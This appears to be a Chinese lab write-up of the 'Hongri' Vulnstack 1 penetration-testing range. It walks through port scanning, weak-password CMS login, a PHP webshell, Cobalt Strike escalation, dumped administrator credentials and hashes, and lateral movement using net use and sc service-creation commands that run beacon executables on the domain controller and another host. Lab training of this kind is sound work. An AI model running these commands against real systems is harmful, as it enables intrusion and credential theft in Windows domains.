红日靶场1

这篇具有很好参考价值的文章主要介绍了红日靶场1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶场环境搭建

机器名称 外网IP(模拟外网) 内网IP(模拟内网)
攻击机器 192.168.142.133
Win7机器 192.168.142.210 192.168.140.210
Win Server 2008机器(DC) 192.168.140.220
Win Server 2003机器 192.168.140.230

坑点

(1)在Win7机器上打开phpstudy时,第一次会出现报错,需要重启一下Win7机器。

1、通过arp-scan命令和nmap探测C段存活主机

arp-scan -l

红日靶场1

nmap 192.168.142.0/24 -sn     -sn参数的代表只通过ping探测主机

红日靶场1

2、确定目标主机为192.168.142.210,则对其进行端口探测

nmap -sV -Pn 192.168.142.210     -sV代表探测系统版本 -Pn代表跳过主机发现,直接对端口探测

红日靶场1

发现192.168.142.210是开放了80、135、3306端口(存在未授权漏洞),而且是Windows机器,如果想探测详细版本可以通过-O参数。

3、访问web服务寻找突破点。

红日靶场1

(1)探针信息收集

服务器:Win7
服务器主机名:STU1
网站根目录:C:/phpStudy/WWW
管理员邮箱:admin@phpStudy.net

(2)发现mysql连接检测

红日靶场1

尝试了几个常见密码,用户名:root ,密码:root 成功。

(3)远程连接mysql

红日靶场1

连接失败。

4、对站点信息收集

(1)目录扫描

红日靶场1

(2)发现一个beifen.rar文件,下载查看文件

红日靶场1

是一个yxcms建站系统。

5、访问http://192.168.142.210/yxcms/

红日靶场1

/index.php?r=admin进入后台页面

后台的用户名:admin ,密码:123456

6、登录后台页面

红日靶场1

7、发现前台模版中存在很多php文件,创建一个test.php

红日靶场1

红日靶场1

8、在yxcms文件中去定位test.php的位置

红日靶场1

9、访问http://192.168.142.210/yxcms/protected/apps/default/view/default/test.php

红日靶场1

解析成功

10、用蚁剑连接拿到webshell

红日靶场1

11、进行初步内网信息收集

红日靶场1

当前权限:stu1\win7

12、上线到CS上进行提权

红日靶场1

成功提权

13、信息收集,尝试各种横向移动方式

(1)抓取明文密码和NTLM哈希

红日靶场1

administrator用户的密码:admin@123

administrator的LM哈希值:6f08d7b306b1dad4b75e0c8d76954a50

administrator的NTLM哈希值:579da618cfbfa85247acf1f800a280a4

(2)查询主机情况

net view

红日靶场1

(3)定位DC机器

shell nslookup -type=SRV _ldap._tcp

红日靶场1

(4)尝试IPC横向移动到DC机器

shell net use \\192.168.140.220\ipc$ "admin@123" /user:administrator
shell dir \\192.168.140.220\c$

红日靶场1

(5)利用系统服务进行上线

shell copy test.exe \\192.168.140.220\c$
shell sc \\192.168.140.220 create test binpath= "cmd.exe /c c:\test.exe"
shell sc \\192.168.140.220 start test
shell sc \\192.168.140.220 delete test

红日靶场1

没有上线,可能是因为内网机器不出网,可以多试几种方法:计划任务上线、PsExec上线

14、CS上线不出网机器的方法

(1)SMB-Beacon上线
(2)TCP-Beacon上线
(3)http代理+端口转发
(4)CS中转技术

SMB-Beacon上线

红日靶场1

成功上线域控。

15、通过域控上线192.168.140.230机器

域控上线后,什么都没做,直接可以远程访问192.168.140.230机器文件

红日靶场1

上传一个TCP-Beacon木马到192.168.140.230机器

红日靶场1

16、利用系统服务上线192.168.140.230机器

shell sc \\192.168.140.230 create TCP binpath= "cmd.exe /c c:\TCP.exe"
shell sc \\192.168.140.230 start TCP
shell sc \\192.168.140.230 delete TCP

红日靶场1

成功上线。文章来源地址https://www.toymoban.com/news/detail-710812.html

到了这里,关于红日靶场1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 红日内网渗透靶场2

    目录   环境搭建: Web渗透: weblogic漏洞利用 java反序列化漏洞利用、哥斯拉获取shell 上线msf msf派生shell到cs 内网信息收集 mimikatz获取用户密码 cs横向移动 PTT攻击(票据传递) 方法2:通过msf利用永恒之蓝以及3389端口 上线cs cs派生shell给msf fscan扫描内网 frp搭建socks5隧道代理 永

    2024年01月21日
    浏览(52)
  • vulnstack1 红日靶场渗透详解

    目录 环境搭建 信息收集 PhpMyAdmin 后台 Getshell into outfile Mysql日志文件写入shell CS后渗透 MSF后渗透 知识补充 nmap 参数分类 参数速查表 dirsearch ip段设置 kali可以访问win7,但不能直接访问win08和win2k3 开启win7 web/mysql服务 端口扫描 80/tcp open http 3306/tcp open mysql web目录扫描 爆破登录

    2024年02月12日
    浏览(38)
  • 红日靶场2 ATT&&CK攻击

    360免杀其实没有你想象的那么难 首先最重要的是 你要用免杀脚本对你所生成的木马病毒进行加密 然后加密系统的内核,就是上一篇文章所提及的 是通过两次加密之后 所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会

    2024年01月18日
    浏览(41)
  • 红日ATT&CK系列靶场(-)简记

    Step 1》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描 发现:/phpMyadmin Step 2 》漏洞利用 1.弱口令 http://192.168.92.100/phpMyadmin root/root 登录成功 2.getshell select @@basedir //查绝对路径 into outfile 写马 select \\\'?php eval($_POST[cmd]);?\\\' into outfile \\\'C://绝对路径/shell.

    2024年02月09日
    浏览(43)
  • 红日靶场2 指免杀360 个人学习记录

    360安全卫士,有一说一,确实很强,这几天研究的MSF利用java反序列化的漏洞是无法利用的,其他方法也瘦小甚微 前几天在研究用 用免杀工具 go-shellcode-loader-main免杀工具对我们生成的木马进行加密 本来是用csa4.0黑客工具生成了一个jsp的恶意代码 我首先要承认,微软自带的病

    2024年01月16日
    浏览(39)
  • vulfocus靶场搭建(docker环境)

    访问方式: http://172.16.51.142 账号密码:admin/admin 登录之后,在 镜像管理 中 一键同步 可以查看所有漏洞的镜像 下载好想要练习的漏洞镜像之后,去首页启动环境,获取访问地址 不想自己本地搭建vulfocus可以访问fofa的公用靶场:  http://vulfocus.fofa.so

    2024年02月08日
    浏览(37)
  • 【Linux】无法连外网,只能用压缩包,环境搭建流程

    (1)检查防火墙状态 下图表示防火墙运行中,需要执行关闭命令 (2)关闭防火墙 (3)关闭防火墙自启动服务 jdk下载 xftp传入服务器,上传到/usr/local文件夹下 解压文件到当前目录下 给解压后的文件夹重命名 现在/usr/local路径下就有了一个jdk8文件夹 (1)编辑全局配置文件

    2024年02月16日
    浏览(30)
  • linux搭建环境内网与外网ping通各种方法

    首先我们要做的是环境搭建 我以这个为例内网在虚拟编辑器中 设为192.168.1.0 外网设为202.112.113.0 内网 :ip192.168.1.10/24 子网掩码 192.168.1.5 防火墙/代理服务器 双网卡 内网主机,外网nat模式 ens33 :ip192.168.1.5/24 子网掩码 192.168.1.5 ens37需要联网   ip 202.112.113.5/24 子网掩码 202.112.

    2024年02月06日
    浏览(40)
  • 在kali环境下安装Beef-Xss靶场搭建

    目录 一、更新安装包 二、安装beef-xss 三、启动Beef-Xss工具 1、查看hook.js 2、查看后台登录地址 3、查看用户名和登录密码 4、登录页面 5、点击 Hook me:将配置的页面导入BEEF中 ┌──(root㉿kali)-[/home/kali] └─# apt-get update   ┌──(root㉿kali)-[/home/kali] └─# apt-get install beef-xss 第一

    2024年02月10日
    浏览(37)
  • Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境

    好吧,上次更新博客也不记得是几年前的事情了,来说说消失的这段时间我在干嘛。最近超级无敌忙,每天送餐从早送到晚,同时兼职某团和饿了某,现在正在给一个靓女送杯奶茶,做安服税后5千块钱的工资能干嘛?赶紧和我一起做某团骑手,少走30年弯路。 难得有空,最近

    2024年02月05日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包